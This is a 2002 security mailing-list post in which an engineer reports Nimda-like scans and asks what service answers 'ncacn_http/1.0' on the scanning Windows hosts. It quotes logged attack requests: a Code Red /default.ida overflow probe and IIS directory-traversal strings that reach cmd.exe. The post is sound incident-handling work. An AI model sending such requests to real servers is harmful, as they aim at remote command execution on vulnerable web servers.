Security Incidents mailing list archives

ncacn_http/1.0

From: <theGooo () hotmail com>
Date: Thu, 7 Mar 2002 12:37:18 +0200


 I have been getting Nimda like scans from different hosts this morning.


        
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNN
        scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
        _mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe
        /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir

 When I checked these hosts, I found that they have some ports that
display "ncacn_http/1.0" when you connect to them. Is this Netcat or
something else? 
 BTW, all these servers don't have a port 80 open and they are windows
machines.

Regards,
Sameh
========================================
Sameh Y. Farag
Security Engineer
Internet Security Systems - Middle East
Tel:        +2 02 7607011
Fax:        +2 02 7607013
<http://www.iss.net/>
The power to protect
======================================== 


__________________________________________________
Manage your Hotmail with ANY email application:
Get Pop3Hot at <http://pop3hot.com/main.htm>


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

RE: ncacn_http/1.0 McCammon, Keith (Mar 07)
- <Possible follow-ups>
- ncacn_http/1.0 theGooo (Mar 07)
  - Re: ncacn_http/1.0 cw (Mar 07)